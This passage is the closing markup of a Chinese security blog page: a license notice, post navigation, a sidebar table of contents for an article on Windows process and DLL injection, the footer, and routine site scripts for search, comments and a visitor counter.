    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/C/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> C#</a>
          
            <a href="/tags/Tools/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> Tools</a>
          
            <a href="/tags/知识回顾/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 知识回顾</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/【编程】SharpDecryptPwd/" rel="next" title="【编程】SharpDecryptPwd">
                <i class="fa fa-chevron-left"></i> 【编程】SharpDecryptPwd
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/【域渗透】域内会话收集/" rel="prev" title="【域渗透】域内会话收集">
                【域渗透】域内会话收集 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>


    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODE5NS80NzY4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="RcoIl">
          <p class="site-author-name" itemprop="name">RcoIl</p>
           
              <p class="site-description motion-element" itemprop="description">好吃懒做，还有就是皮肤比黄皮果还黄！</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">40</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">18</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/RcoIl" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=rcoil@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-fa fa-envelope-open"></i>
                  
                  Email
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://t.zsxq.com/i2zJI2V" target="_blank" title="知识星球">
                  
                    <i class="fa fa-fw fa-fa fa-battery-bolt"></i>
                  
                  知识星球
                </a>
              </span>
            
          
        </div>

        
        
		
		
          <div class="feed-link motion-element">
            <div id="days"></div>
			<script language="javascript">
			function show_date_time(){
				window.setTimeout("show_date_time()", 1000);
				BirthDay=new Date("09/01/2016 10:13:14");
				today=new Date();
				timeold=(today.getTime()-BirthDay.getTime());
				sectimeold=timeold/1000
				secondsold=Math.floor(sectimeold);
				msPerDay=24*60*60*1000
				e_daysold=timeold/msPerDay
				daysold=Math.floor(e_daysold);
				e_hrsold=(e_daysold-daysold)*24;
				hrsold=setzero(Math.floor(e_hrsold));
				e_minsold=(e_hrsold-hrsold)*60;
				minsold=setzero(Math.floor((e_hrsold-hrsold)*60));
				seconds=setzero(Math.floor((e_minsold-minsold)*60));
				document.getElementById('days').innerHTML="本站已运行 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分"+ seconds +" 秒";
			}
			function setzero(i){
				if (i<10)
				{i="0" + i};
				return i;
			}		
			show_date_time();
		</script>
        </div>
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn/" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://rootrain.me/" title="rootrain" target="_blank">rootrain</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://kerlinglovsec.lofter.com/" title="kerling" target="_blank">kerling</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.luolikong.vip/" title="Fire-ant" target="_blank">Fire-ant</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xnianq.cn/" title="xniang" target="_blank">xniang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://thief.one/" title="nMask" target="_blank">nMask</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://cate4cafe.com/" title="cate4cafe" target="_blank">cate4cafe</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://52stu.me/" title="IversOn5" target="_blank">IversOn5</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hone.cool/" title="Hone" target="_blank">Hone</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://sharecast.bitcron.com/" title="sharecast" target="_blank">sharecast</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://scarletf.github.io/" title="ScarletF" target="_blank">ScarletF</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.lz1y.cn/" title="Lz1y" target="_blank">Lz1y</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-前言"><span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-什么是进程注入"><span class="nav-text">0x01 什么是进程注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-VirtualAllocEx-gt-WriteProcessMemory-模式"><span class="nav-text">0x02 VirtualAllocEx =&gt; WriteProcessMemory 模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-深入了解函数"><span class="nav-text">0x03 深入了解函数</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-访问远程进程"><span class="nav-text">3.1 访问远程进程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-2-为-shellcode-分配空间"><span class="nav-text">3.2 为 shellcode 分配空间</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-3-在远程进程中写入-shellcode"><span class="nav-text">3.3 在远程进程中写入 shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-4-执行-shellcode"><span class="nav-text">3.4 执行 shellcode</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-演示"><span class="nav-text">0x04 演示</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-DLL-注入"><span class="nav-text">0x05 DLL 注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-什么是DLL？"><span class="nav-text">5.1 什么是DLL？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-2-什么是DLL注入？"><span class="nav-text">5.2 什么是DLL注入？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-3-相关函数"><span class="nav-text">5.3 相关函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-4-示例代码"><span class="nav-text">5.4 示例代码</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x06-来源参考"><span class="nav-text">0x06 来源参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
<!--
    <i class="fa fa-heart"></i>
-->
	<i class="fa fa-address-card-o" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">RcoIl</span>
</div>
<!--

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-blind" aria-hidden="true"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-user-md" aria-hidden="true"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("KVNdpVifyFqJPx0bzSg6cN7z-gzGzoHsz", "vlNRwqLbdUTKC1W06gjYj0iG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
